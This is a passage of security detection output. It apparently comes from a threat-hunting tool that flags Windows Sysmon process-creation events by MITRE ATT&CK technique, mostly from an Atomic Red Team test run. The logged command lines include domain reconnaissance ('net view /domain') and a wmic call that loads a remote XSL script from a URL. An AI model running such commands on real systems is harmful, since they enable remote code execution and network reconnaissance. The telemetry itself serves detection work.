<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:09.804</Data>
<Data Name=""ProcessGuid"">747F3D96-D8DD-5D31-0000-0010EF923300</Data>
<Data Name=""ProcessId"">4856</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view /domain&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547869.823311,2019-07-19T18:51:09.823311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:06.888030Z"">
</TimeCreated>
<EventRecordID>3767</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:06.873</Data>
<Data Name=""ProcessGuid"">747F3D96-D8DA-5D31-0000-00100D8A3300</Data>
<Data Name=""ProcessId"">4016</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1563547866.88803,2019-07-19T18:51:06.888030+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:06.753240Z"">
</TimeCreated>
<EventRecordID>3766</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:06.748</Data>
<Data Name=""ProcessGuid"">747F3D96-D8DA-5D31-0000-001029863300</Data>
<Data Name=""ProcessId"">3220</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">WMI Commandline Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8DA-5D31-0000-0010D3833300</Data>
<Data Name=""ParentProcessId"">5340</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:06.728089Z"">
</TimeCreated>
<EventRecordID>3765</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:06.714</Data>
<Data Name=""ProcessGuid"">747F3D96-D8DA-5D31-0000-0010D3833300</Data>
<Data Name=""ProcessId"">5340</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:51:06.728089Z"">
</TimeCreated>
<EventRecordID>3765</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:51:06.714</Data>
<Data Name=""ProcessGuid"">747F3D96-D8DA-5D31-0000-0010D3833300</Data>
<Data Name=""ProcessId"">5340</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1603194656.569246,2020-10-20T15:50:56.569246+04:00,,Threat,Low,Found User (DESKTOP-NTSSLJD\den) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-20T11:50:56.569102Z"">
</TimeCreated>
<EventRecordID>988</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""7212"" ThreadID=""9748"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>DESKTOP-NTSSLJD</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1059.003,technique_name=Windows Command Shell</Data>
<Data Name=""UtcTime"">2020-10-20 11:50:56.472</Data>
<Data Name=""ProcessGuid"">23F38D93-CF20-5F8E-D008-000000000C00</Data>
<Data Name=""ProcessId"">9620</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">DESKTOP-NTSSLJD\den</Data>
<Data Name=""LogonGuid"">23F38D93-AE9B-5F8E-A2EC-170000000000</Data>
<Data Name=""LogonId"">0x17eca2</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">23F38D93-CF20-5F8E-CE08-000000000C00</Data>
<Data Name=""ParentProcessId"">6896</Data>
<Data Name=""ParentImage"">C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe</Data>
<Data Name=""ParentCommandLine"">C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe</Data>
</EventData>
</Event>",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547866.728089,2019-07-19T18:51:06.728089+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:56.182990Z"">
</TimeCreated>
<EventRecordID>3764</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:56.162</Data>
<Data Name=""ProcessGuid"">747F3D96-D8D0-5D31-0000-001034673300</Data>
<Data Name=""ProcessId"">396</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1563547856.18299,2019-07-19T18:50:56.182990+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe process /FORMAT:list ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:56.047770Z"">
</TimeCreated>
<EventRecordID>3763</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:56.021</Data>
<Data Name=""ProcessGuid"">747F3D96-D8D0-5D31-0000-0010F3623300</Data>
<Data Name=""ProcessId"">7040</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">WMI Commandline Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">wmic.exe process /FORMAT:list</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D8CF-5D31-0000-00109B603300</Data>
<Data Name=""ParentProcessId"">5380</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:list&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:list&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:55.991996Z"">
</TimeCreated>
<EventRecordID>3762</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:55.978</Data>
<Data Name=""ProcessGuid"">747F3D96-D8CF-5D31-0000-00109B603300</Data>
<Data Name=""ProcessId"">5380</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:list&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1563547856.04777,2019-07-19T18:50:56.047770+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:list&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:55.991996Z"">
</TimeCreated>
<EventRecordID>3762</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:55.978</Data>
<Data Name=""ProcessGuid"">747F3D96-D8CF-5D31-0000-00109B603300</Data>
<Data Name=""ProcessId"">5380</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:list&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547855.991996,2019-07-19T18:50:55.991996+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:53.062635Z"">
</TimeCreated>
<EventRecordID>3761</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:53.038</Data>
<Data Name=""ProcessGuid"">747F3D96-D8CD-5D31-0000-001047543300</Data>
<Data Name=""ProcessId"">1852</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
